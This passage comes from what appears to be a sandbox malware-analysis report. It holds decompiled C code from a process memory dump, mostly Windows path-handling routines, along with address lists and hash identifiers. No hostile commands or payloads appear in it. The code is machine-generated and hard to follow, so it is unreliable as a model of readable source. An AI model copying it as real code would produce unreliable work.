                                                                                                            				signed int _t213;
                                                                                                            				signed int _t225;
                                                                                                            				short _t233;
                                                                                                            				signed char _t234;
                                                                                                            				signed int _t242;
                                                                                                            				signed int _t243;
                                                                                                            				signed int _t244;
                                                                                                            				signed int _t245;
                                                                                                            				signed int _t250;
                                                                                                            				void* _t251;
                                                                                                            				signed short* _t254;
                                                                                                            				void* _t255;
                                                                                                            				signed int _t256;
                                                                                                            				void* _t257;
                                                                                                            				signed short* _t260;
                                                                                                            				signed short _t265;
                                                                                                            				signed short* _t269;
                                                                                                            				signed short _t271;
                                                                                                            				signed short** _t272;
                                                                                                            				signed short* _t275;
                                                                                                            				signed short _t282;
                                                                                                            				signed short _t283;
                                                                                                            				signed short _t290;
                                                                                                            				signed short _t299;
                                                                                                            				signed short _t307;
                                                                                                            				signed int _t308;
                                                                                                            				signed short _t311;
                                                                                                            				signed short* _t315;
                                                                                                            				signed short _t316;
                                                                                                            				void* _t317;
                                                                                                            				void* _t319;
                                                                                                            				signed short* _t321;
                                                                                                            				void* _t322;
                                                                                                            				void* _t323;
                                                                                                            				unsigned int _t324;
                                                                                                            				signed int _t325;
                                                                                                            				void* _t326;
                                                                                                            				signed int _t327;
                                                                                                            				signed int _t329;
                                                                                                            
                                                                                                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                                            				_v8 =  *0x115d360 ^ _t329;
                                                                                                            				_t157 = _a8;
                                                                                                            				_t321 = _a4;
                                                                                                            				_t315 = __edx;
                                                                                                            				_v548 = __ecx;
                                                                                                            				_t305 = _a20;
                                                                                                            				_v560 = _a12;
                                                                                                            				_t260 = _a16;
                                                                                                            				_v564 = __edx;
                                                                                                            				_v580 = _a8;
                                                                                                            				_v572 = _t260;
                                                                                                            				_v544 = _a20;
                                                                                                            				if( *__edx <= 8) {
                                                                                                            					L3:
                                                                                                            					if(_t260 != 0) {
                                                                                                            						 *_t260 = 0;
                                                                                                            					}
                                                                                                            					_t254 =  &_v532;
                                                                                                            					_v588 = 0x208;
                                                                                                            					if((_v548 & 0x00000001) != 0) {
                                                                                                            						_v556 =  *_t315;
                                                                                                            						_v552 = _t315[2];
                                                                                                            						_t161 = E0109F232( &_v556);
                                                                                                            						_t316 = _v556;
                                                                                                            						_v540 = _t161;
                                                                                                            						goto L17;
                                                                                                            					} else {
                                                                                                            						_t306 = 0x208;
                                                                                                            						_t298 = _t315;
                                                                                                            						_t316 = E01086E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                                            						if(_t316 == 0) {
                                                                                                            							L68:
                                                                                                            							_t322 = 0xc0000033;
                                                                                                            							goto L39;
                                                                                                            						} else {
                                                                                                            							while(_v581 == 0) {
                                                                                                            								_t233 = _v588;
                                                                                                            								if(_t316 > _t233) {
                                                                                                            									_t234 = _v548;
                                                                                                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                                            										_t254 = L01084620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                                            										if(_t254 == 0) {
                                                                                                            											_t169 = 0xc0000017;
                                                                                                            										} else {
                                                                                                            											_t298 = _v564;
                                                                                                            											_v588 = _t316;
                                                                                                            											_t306 = _t316;
                                                                                                            											_t316 = E01086E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                                            											if(_t316 != 0) {
                                                                                                            												continue;
                                                                                                            											} else {
                                                                                                            												goto L68;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										goto L90;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_v556 = _t316;
                                                                                                            									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                                            									_v552 = _t254;
                                                                                                            									if(_t316 < 2) {
                                                                                                            										L11:
                                                                                                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                                            											_t161 = 5;
                                                                                                            										} else {
                                                                                                            											if(_t316 < 6) {
                                                                                                            												L87:
                                                                                                            												_t161 = 3;
                                                                                                            											} else {
                                                                                                            												_t242 = _t254[2] & 0x0000ffff;
                                                                                                            												if(_t242 != 0x5c) {
                                                                                                            													if(_t242 == 0x2f) {
                                                                                                            														goto L16;
                                                                                                            													} else {
                                                                                                            														goto L87;
                                                                                                            													}
                                                                                                            													goto L101;
                                                                                                            												} else {
                                                                                                            													L16:
                                                                                                            													_t161 = 2;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t243 =  *_t254 & 0x0000ffff;
                                                                                                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                                            											if(_t316 < 4) {
                                                                                                            												L81:
                                                                                                            												_t161 = 4;
                                                                                                            												goto L17;
                                                                                                            											} else {
                                                                                                            												_t244 = _t254[1] & 0x0000ffff;
                                                                                                            												if(_t244 != 0x5c) {
                                                                                                            													if(_t244 == 0x2f) {
                                                                                                            														goto L60;
                                                                                                            													} else {
                                                                                                            														goto L81;
                                                                                                            													}
                                                                                                            												} else {
                                                                                                            													L60:
                                                                                                            													if(_t316 < 6) {
                                                                                                            														L83:
                                                                                                            														_t161 = 1;
                                                                                                            														goto L17;
                                                                                                            													} else {
                                                                                                            														_t245 = _t254[2] & 0x0000ffff;
                                                                                                            														if(_t245 != 0x2e) {
                                                                                                            															if(_t245 == 0x3f) {
                                                                                                            																goto L62;
                                                                                                            															} else {
                                                                                                            																goto L83;
                                                                                                            															}
                                                                                                            														} else {
                                                                                                            															L62:
                                                                                                            															if(_t316 < 8) {
                                                                                                            																L85:
                                                                                                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                                            																goto L17;
                                                                                                            															} else {
                                                                                                            																_t250 = _t254[3] & 0x0000ffff;
                                                                                                            																if(_t250 != 0x5c) {
                                                                                                            																	if(_t250 == 0x2f) {
                                                                                                            																		goto L64;
                                                                                                            																	} else {
                                                                                                            																		goto L85;
                                                                                                            																	}
                                                                                                            																} else {
                                                                                                            																	L64:
                                                                                                            																	_t161 = 6;
                                                                                                            																	goto L17;
                                                                                                            																}
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											goto L101;
                                                                                                            										} else {
                                                                                                            											goto L11;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L17:
                                                                                                            									if(_t161 != 2) {
                                                                                                            										_t162 = _t161 - 1;
                                                                                                            										if(_t162 > 5) {
                                                                                                            											goto L18;
                                                                                                            										} else {
                                                                                                            											switch( *((intOrPtr*)(_t162 * 4 +  &M010845F8))) {
                                                                                                            												case 0:
                                                                                                            													_v568 = 0x1041078;
                                                                                                            													__eax = 2;
                                                                                                            													goto L20;
                                                                                                            												case 1:
                                                                                                            													goto L18;
                                                                                                            												case 2:
                                                                                                            													_t163 = 4;
                                                                                                            													goto L19;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										goto L41;
                                                                                                            									} else {
                                                                                                            										L18:
                                                                                                            										_t163 = 0;
                                                                                                            										L19:
                                                                                                            										_v568 = 0x10411c4;
                                                                                                            									}
                                                                                                            									L20:
                                                                                                            									_v588 = _t163;
                                                                                                            									_v564 = _t163 + _t163;
                                                                                                            									_t306 =  *_v568 & 0x0000ffff;
                                                                                                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                                            									_v576 = _t265;
                                                                                                            									if(_t265 > 0xfffe) {
                                                                                                            										L90:
                                                                                                            										_t322 = 0xc0000106;
                                                                                                            									} else {
                                                                                                            										if(_t321 != 0) {
                                                                                                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                                            												if(_v580 != 0) {
                                                                                                            													goto L23;
                                                                                                            												} else {
                                                                                                            													_t322 = 0xc0000106;
                                                                                                            													goto L39;
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_t177 = _t306;
                                                                                                            												goto L25;
                                                                                                            											}
                                                                                                            											goto L101;
                                                                                                            										} else {
                                                                                                            											if(_v580 == _t321) {
                                                                                                            												_t322 = 0xc000000d;
                                                                                                            											} else {
                                                                                                            												L23:
                                                                                                            												_t173 = L01084620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                                            												_t269 = _v592;
                                                                                                            												_t269[2] = _t173;
                                                                                                            												if(_t173 == 0) {
                                                                                                            													_t322 = 0xc0000017;
                                                                                                            												} else {
                                                                                                            													_t316 = _v556;
                                                                                                            													 *_t269 = 0;
                                                                                                            													_t321 = _t269;
                                                                                                            													_t269[1] = _v576;
                                                                                                            													_t177 =  *_v568 & 0x0000ffff;
                                                                                                            													L25:
                                                                                                            													_v580 = _t177;
                                                                                                            													if(_t177 == 0) {
                                                                                                            														L29:
                                                                                                            														_t307 =  *_t321 & 0x0000ffff;
                                                                                                            													} else {
                                                                                                            														_t290 =  *_t321 & 0x0000ffff;
                                                                                                            														_v576 = _t290;
                                                                                                            														_t310 = _t177 & 0x0000ffff;
                                                                                                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                                            															_t307 =  *_t321 & 0xffff;
                                                                                                            														} else {
                                                                                                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                                            															E010AF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                                            															_t329 = _t329 + 0xc;
                                                                                                            															_t311 = _v580;
                                                                                                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                                            															 *_t321 = _t225;
                                                                                                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                            															}
                                                                                                            															goto L29;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													_t271 = _v556 - _v588 + _v588;
                                                                                                            													_v580 = _t307;
                                                                                                            													_v576 = _t271;
                                                                                                            													if(_t271 != 0) {
                                                                                                            														_t308 = _t271 & 0x0000ffff;
                                                                                                            														_v588 = _t308;
                                                                                                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                                            															E010AF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                                            															_t329 = _t329 + 0xc;
                                                                                                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                                            															 *_t321 = _t213;
                                                                                                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                                            															}
                                                                                                            														}
                                                                                                            													}
                                                                                                            													_t272 = _v560;
                                                                                                            													if(_t272 != 0) {
                                                                                                            														 *_t272 = _t321;
                                                                                                            													}
                                                                                                            													_t306 = 0;
                                                                                                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                            													_t275 = _v572;
                                                                                                            													if(_t275 != 0) {
                                                                                                            														_t306 =  *_t275;
                                                                                                            														if(_t306 != 0) {
                                                                                                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                                            														}
                                                                                                            													}
                                                                                                            													_t181 = _v544;
                                                                                                            													if(_t181 != 0) {
                                                                                                            														 *_t181 = 0;
                                                                                                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                                            														if(_v540 == 5) {
                                                                                                            															_t182 = E010652A5(1);
                                                                                                            															_v588 = _t182;
                                                                                                            															if(_t182 == 0) {
                                                                                                            																E0107EB70(1, 0x11579a0);
                                                                                                            																goto L38;
                                                                                                            															} else {
                                                                                                            																_v560 = _t182 + 0xc;
                                                                                                            																_t185 = E0107AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                                            																if(_t185 == 0) {
                                                                                                            																	_t324 = _v588;
                                                                                                            																	goto L97;
                                                                                                            																} else {
                                                                                                            																	_t306 = _v544;
                                                                                                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                                            																	 *(_t306 + 4) = _t282;
                                                                                                            																	_v576 = _t282;
                                                                                                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                                            																	 *_t306 = _t325;
                                                                                                            																	if( *_t282 == 0x5c) {
                                                                                                            																		_t149 = _t325 - 2; // -2
                                                                                                            																		_t283 = _t149;
                                                                                                            																		 *_t306 = _t283;
                                                                                                            																		 *(_t306 + 4) = _v576 + 2;
                                                                                                            																		_t185 = _t283 & 0x0000ffff;
                                                                                                            																	}
                                                                                                            																	_t324 = _v588;
                                                                                                            																	 *(_t306 + 2) = _t185;
                                                                                                            																	if((_v548 & 0x00000002) == 0) {
                                                                                                            																		L97:
                                                                                                            																		asm("lock xadd [esi], eax");
                                                                                                            																		if((_t185 | 0xffffffff) == 0) {
                                                                                                            																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                                            																			E010A95D0();
                                                                                                            																			L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                                            																		}
                                                                                                            																	} else {
                                                                                                            																		 *(_t306 + 0xc) = _t324;
                                                                                                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                                            																	}
                                                                                                            																	goto L38;
                                                                                                            																}
                                                                                                            															}
                                                                                                            															goto L41;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													L38:
                                                                                                            													_t322 = 0;
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L39:
                                                                                                            									if(_t254 !=  &_v532) {
                                                                                                            										L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                                            									}
                                                                                                            									_t169 = _t322;
                                                                                                            								}
                                                                                                            								goto L41;
                                                                                                            							}
                                                                                                            							goto L68;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L41:
                                                                                                            					_pop(_t317);
                                                                                                            					_pop(_t323);
                                                                                                            					_pop(_t255);
                                                                                                            					return E010AB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                                            				} else {
                                                                                                            					_t299 = __edx[2];
                                                                                                            					if( *_t299 == 0x5c) {
                                                                                                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                                            						if(_t256 != 0x5c) {
                                                                                                            							if(_t256 != 0x3f) {
                                                                                                            								goto L2;
                                                                                                            							} else {
                                                                                                            								goto L50;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							L50:
                                                                                                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                                            								goto L2;
                                                                                                            							} else {
                                                                                                            								_t251 = E010A3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                                            								_pop(_t319);
                                                                                                            								_pop(_t326);
                                                                                                            								_pop(_t257);
                                                                                                            								return E010AB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L2:
                                                                                                            						_t260 = _v572;
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L101:
                                                                                                            			}















































































                                                                                                            0x00000000
                                                                                                            0x01084288
                                                                                                            0x0108428c
                                                                                                            0x010ce298
                                                                                                            0x01084292
                                                                                                            0x01084292
                                                                                                            0x0108429e
                                                                                                            0x010842a3
                                                                                                            0x010842a7
                                                                                                            0x010842ac
                                                                                                            0x010ce22d
                                                                                                            0x010842b2
                                                                                                            0x010842b2
                                                                                                            0x010842b9
                                                                                                            0x010842bc
                                                                                                            0x010842c2
                                                                                                            0x010842ca
                                                                                                            0x010842cd
                                                                                                            0x010842cd
                                                                                                            0x010842d4
                                                                                                            0x0108433f
                                                                                                            0x0108433f
                                                                                                            0x010842d6
                                                                                                            0x010842d6
                                                                                                            0x010842d9
                                                                                                            0x010842dd
                                                                                                            0x010842eb
                                                                                                            0x010ce23a
                                                                                                            0x010842f1
                                                                                                            0x01084305
                                                                                                            0x0108430d
                                                                                                            0x01084315
                                                                                                            0x01084318
                                                                                                            0x0108431f
                                                                                                            0x01084322
                                                                                                            0x0108432e
                                                                                                            0x0108433b
                                                                                                            0x0108433b
                                                                                                            0x00000000
                                                                                                            0x0108432e
                                                                                                            0x010842eb
                                                                                                            0x0108434c
                                                                                                            0x0108434e
                                                                                                            0x01084352
                                                                                                            0x01084359
                                                                                                            0x0108435e
                                                                                                            0x01084361
                                                                                                            0x0108436e
                                                                                                            0x0108438a
                                                                                                            0x0108438e
                                                                                                            0x01084396
                                                                                                            0x0108439e
                                                                                                            0x010843a1
                                                                                                            0x010843ad
                                                                                                            0x010843bb
                                                                                                            0x010843bb
                                                                                                            0x010843ad
                                                                                                            0x0108436e
                                                                                                            0x010843bf
                                                                                                            0x010843c5
                                                                                                            0x01084463
                                                                                                            0x01084463
                                                                                                            0x010843ce
                                                                                                            0x010843d5
                                                                                                            0x010843d9
                                                                                                            0x010843df
                                                                                                            0x01084475
                                                                                                            0x01084479
                                                                                                            0x01084491
                                                                                                            0x01084491
                                                                                                            0x01084479
                                                                                                            0x010843e5
                                                                                                            0x010843eb
                                                                                                            0x010843f4
                                                                                                            0x010843f6
                                                                                                            0x010843f9
                                                                                                            0x010843fc
                                                                                                            0x010843ff
                                                                                                            0x010844e8
                                                                                                            0x010844ed
                                                                                                            0x010844f3
                                                                                                            0x010ce247
                                                                                                            0x00000000
                                                                                                            0x010844f9
                                                                                                            0x01084504
                                                                                                            0x01084508
                                                                                                            0x0108450f
                                                                                                            0x010ce269
                                                                                                            0x00000000
                                                                                                            0x01084515
                                                                                                            0x01084519
                                                                                                            0x01084531
                                                                                                            0x01084534
                                                                                                            0x01084537
                                                                                                            0x0108453e
                                                                                                            0x01084541
                                                                                                            0x0108454a
                                                                                                            0x010ce255
                                                                                                            0x010ce255
                                                                                                            0x010ce25b
                                                                                                            0x010ce25e
                                                                                                            0x010ce261
                                                                                                            0x010ce261
                                                                                                            0x01084555
                                                                                                            0x01084559
                                                                                                            0x0108455d
                                                                                                            0x010ce26d
                                                                                                            0x010ce270
                                                                                                            0x010ce274
                                                                                                            0x010ce27a
                                                                                                            0x010ce27d
                                                                                                            0x010ce28e
                                                                                                            0x010ce28e
                                                                                                            0x01084563
                                                                                                            0x01084563
                                                                                                            0x01084569
                                                                                                            0x01084569
                                                                                                            0x00000000
                                                                                                            0x0108455d
                                                                                                            0x0108450f
                                                                                                            0x00000000
                                                                                                            0x010844f3
                                                                                                            0x010843ff
                                                                                                            0x01084405
                                                                                                            0x01084405
                                                                                                            0x01084405
                                                                                                            0x010842ac
                                                                                                            0x0108428c
                                                                                                            0x01084282
                                                                                                            0x01084407
                                                                                                            0x0108440d
                                                                                                            0x010ce2af
                                                                                                            0x010ce2af
                                                                                                            0x01084413
                                                                                                            0x01084413
                                                                                                            0x00000000
                                                                                                            0x010841d4
                                                                                                            0x00000000
                                                                                                            0x010841c3
                                                                                                            0x010841bd
                                                                                                            0x01084415
                                                                                                            0x01084415
                                                                                                            0x01084416
                                                                                                            0x01084417
                                                                                                            0x01084429
                                                                                                            0x0108416e
                                                                                                            0x0108416e
                                                                                                            0x01084175
                                                                                                            0x01084498
                                                                                                            0x0108449f
                                                                                                            0x010ce12d
                                                                                                            0x00000000
                                                                                                            0x010ce133
                                                                                                            0x00000000
                                                                                                            0x010ce133
                                                                                                            0x010844a5
                                                                                                            0x010844a5
                                                                                                            0x010844aa
                                                                                                            0x00000000
                                                                                                            0x010844bb
                                                                                                            0x010844ca
                                                                                                            0x010844d6
                                                                                                            0x010844d7
                                                                                                            0x010844d8
                                                                                                            0x010844e3
                                                                                                            0x010844e3
                                                                                                            0x010844aa
                                                                                                            0x0108417b
                                                                                                            0x0108417b
                                                                                                            0x0108417b
                                                                                                            0x00000000
                                                                                                            0x0108417b
                                                                                                            0x01084175
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aef2f2abcc77ec36105ab96978e6bf9f50227eada649864a62eb88ef547e454a
                                                                                                            • Instruction ID: dfc09563cdfd709b8c3f7d84adcaf81bf90be4d2c64feac0b8393830f32e3157
                                                                                                            • Opcode Fuzzy Hash: aef2f2abcc77ec36105ab96978e6bf9f50227eada649864a62eb88ef547e454a
                                                                                                            • Instruction Fuzzy Hash: EAF169706082128BC764EF58C480B7EBBE1EF98714F55896EF9C6CB291E734D891CB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 92%
                                                                                                            			E010920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed char _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				signed int _v32;
                                                                                                            				void* _v36;
                                                                                                            				char _v48;
                                                                                                            				signed int _v52;
                                                                                                            				signed int _v56;
                                                                                                            				unsigned int _v60;
                                                                                                            				char _v64;
                                                                                                            				unsigned int _v68;
                                                                                                            				signed int _v72;
                                                                                                            				char _v73;
                                                                                                            				signed int _v74;
                                                                                                            				char _v75;
                                                                                                            				signed int _v76;
                                                                                                            				void* _v81;
                                                                                                            				void* _v82;
                                                                                                            				void* _v89;
                                                                                                            				void* _v92;
                                                                                                            				void* _v97;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed char _t128;
                                                                                                            				void* _t129;
                                                                                                            				signed int _t130;
                                                                                                            				void* _t132;
                                                                                                            				signed char _t133;
                                                                                                            				intOrPtr _t135;
                                                                                                            				signed int _t137;
                                                                                                            				signed int _t140;
                                                                                                            				signed int* _t144;
                                                                                                            				signed int* _t145;
                                                                                                            				intOrPtr _t146;
                                                                                                            				signed int _t147;
                                                                                                            				signed char* _t148;
                                                                                                            				signed int _t149;
                                                                                                            				signed int _t153;
                                                                                                            				signed int _t169;
                                                                                                            				signed int _t174;
                                                                                                            				signed int _t180;
                                                                                                            				void* _t197;
                                                                                                            				void* _t198;
                                                                                                            				signed int _t201;
                                                                                                            				intOrPtr* _t202;
                                                                                                            				intOrPtr* _t205;
                                                                                                            				signed int _t210;
                                                                                                            				signed int _t215;
                                                                                                            				signed int _t218;
                                                                                                            				signed char _t221;
                                                                                                            				signed int _t226;
                                                                                                            				char _t227;
                                                                                                            				signed int _t228;
                                                                                                            				void* _t229;
                                                                                                            				unsigned int _t231;
                                                                                                            				void* _t235;
                                                                                                            				signed int _t240;
                                                                                                            				signed int _t241;
                                                                                                            				void* _t242;
                                                                                                            				signed int _t246;
                                                                                                            				signed int _t248;
                                                                                                            				signed int _t252;
                                                                                                            				signed int _t253;
                                                                                                            				void* _t254;
                                                                                                            				intOrPtr* _t256;
                                                                                                            				intOrPtr _t257;
                                                                                                            				unsigned int _t262;
                                                                                                            				signed int _t265;
                                                                                                            				void* _t267;
                                                                                                            				signed int _t275;
                                                                                                            
                                                                                                            				_t198 = __ebx;
                                                                                                            				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                                            				_v68 = __ecx;
                                                                                                            				_v73 = 0;
                                                                                                            				_t201 = __edx & 0x00002000;
                                                                                                            				_t128 = __edx & 0xffffdfff;
                                                                                                            				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                                            				_v72 = _t128;
                                                                                                            				if((_t128 & 0x00000008) != 0) {
                                                                                                            					__eflags = _t128 - 8;
                                                                                                            					if(_t128 != 8) {
                                                                                                            						L69:
                                                                                                            						_t129 = 0xc000000d;
                                                                                                            						goto L23;
                                                                                                            					} else {
                                                                                                            						_t130 = 0;
                                                                                                            						_v72 = 0;
                                                                                                            						_v75 = 1;
                                                                                                            						L2:
                                                                                                            						_v74 = 1;
                                                                                                            						_t226 =  *0x1158714; // 0x0
                                                                                                            						if(_t226 != 0) {
                                                                                                            							__eflags = _t201;
                                                                                                            							if(_t201 != 0) {
                                                                                                            								L62:
                                                                                                            								_v74 = 1;
                                                                                                            								L63:
                                                                                                            								_t130 = _t226 & 0xffffdfff;
                                                                                                            								_v72 = _t130;
                                                                                                            								goto L3;
                                                                                                            							}
                                                                                                            							_v74 = _t201;
                                                                                                            							__eflags = _t226 & 0x00002000;
                                                                                                            							if((_t226 & 0x00002000) == 0) {
                                                                                                            								goto L63;
                                                                                                            							}
                                                                                                            							goto L62;
                                                                                                            						}
                                                                                                            						L3:
                                                                                                            						_t227 = _v75;
                                                                                                            						L4:
                                                                                                            						_t240 = 0;
                                                                                                            						_v56 = 0;
                                                                                                            						_t252 = _t130 & 0x00000100;
                                                                                                            						if(_t252 != 0 || _t227 != 0) {
                                                                                                            							_t240 = _v68;
                                                                                                            							_t132 = E01092EB0(_t240);
                                                                                                            							__eflags = _t132 - 2;
                                                                                                            							if(_t132 != 2) {
                                                                                                            								__eflags = _t132 - 1;
                                                                                                            								if(_t132 == 1) {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								__eflags = _t132 - 6;
                                                                                                            								if(_t132 == 6) {
                                                                                                            									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                                            									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                                            										goto L40;
                                                                                                            									}
                                                                                                            									_t197 = E01092EB0(_t240 + 8);
                                                                                                            									__eflags = _t197 - 2;
                                                                                                            									if(_t197 == 2) {
                                                                                                            										goto L25;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L40:
                                                                                                            								_t133 = 1;
                                                                                                            								L26:
                                                                                                            								_t228 = _v75;
                                                                                                            								_v56 = _t240;
                                                                                                            								__eflags = _t133;
                                                                                                            								if(_t133 != 0) {
                                                                                                            									__eflags = _t228;
                                                                                                            									if(_t228 == 0) {
                                                                                                            										L43:
                                                                                                            										__eflags = _v72;
                                                                                                            										if(_v72 == 0) {
                                                                                                            											goto L8;
                                                                                                            										}
                                                                                                            										goto L69;
                                                                                                            									}
                                                                                                            									_t133 = E010658EC(_t240);
                                                                                                            									_t221 =  *0x1155cac; // 0x16
                                                                                                            									__eflags = _t221 & 0x00000040;
                                                                                                            									if((_t221 & 0x00000040) != 0) {
                                                                                                            										_t228 = 0;
                                                                                                            										__eflags = _t252;
                                                                                                            										if(_t252 != 0) {
                                                                                                            											goto L43;
                                                                                                            										}
                                                                                                            										_t133 = _v72;
                                                                                                            										goto L7;
                                                                                                            									}
                                                                                                            									goto L43;
                                                                                                            								} else {
                                                                                                            									_t133 = _v72;
                                                                                                            									goto L6;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L25:
                                                                                                            							_t133 = _v73;
                                                                                                            							goto L26;
                                                                                                            						} else {
                                                                                                            							L6:
                                                                                                            							_t221 =  *0x1155cac; // 0x16
                                                                                                            							L7:
                                                                                                            							if(_t133 != 0) {
                                                                                                            								__eflags = _t133 & 0x00001000;
                                                                                                            								if((_t133 & 0x00001000) != 0) {
                                                                                                            									_t133 = _t133 | 0x00000a00;
                                                                                                            									__eflags = _t221 & 0x00000004;
                                                                                                            									if((_t221 & 0x00000004) != 0) {
                                                                                                            										_t133 = _t133 | 0x00000400;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								__eflags = _t228;
                                                                                                            								if(_t228 != 0) {
                                                                                                            									_t133 = _t133 | 0x00000100;
                                                                                                            								}
                                                                                                            								_t229 = E010A4A2C(0x1156e40, 0x10a4b30, _t133, _t240);
                                                                                                            								__eflags = _t229;
                                                                                                            								if(_t229 == 0) {
                                                                                                            									_t202 = _a20;
                                                                                                            									goto L100;
                                                                                                            								} else {
                                                                                                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                                            									L15:
                                                                                                            									_t202 = _a20;
                                                                                                            									 *_t202 = _t135;
                                                                                                            									if(_t229 == 0) {
                                                                                                            										L100:
                                                                                                            										 *_a4 = 0;
                                                                                                            										_t137 = _a8;
                                                                                                            										__eflags = _t137;
                                                                                                            										if(_t137 != 0) {
                                                                                                            											 *_t137 = 0;
                                                                                                            										}
                                                                                                            										 *_t202 = 0;
                                                                                                            										_t129 = 0xc0000017;
                                                                                                            										goto L23;
                                                                                                            									} else {
                                                                                                            										_t242 = _a16;
                                                                                                            										if(_t242 != 0) {
                                                                                                            											_t254 = _t229;
                                                                                                            											memcpy(_t242, _t254, 0xd << 2);
                                                                                                            											_t267 = _t267 + 0xc;
                                                                                                            											_t242 = _t254 + 0x1a;
                                                                                                            										}
                                                                                                            										_t205 = _a4;
                                                                                                            										_t25 = _t229 + 0x48; // 0x48
                                                                                                            										 *_t205 = _t25;
                                                                                                            										_t140 = _a8;
                                                                                                            										if(_t140 != 0) {
                                                                                                            											__eflags =  *((char*)(_t267 + 0xa));
                                                                                                            											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                                            											} else {
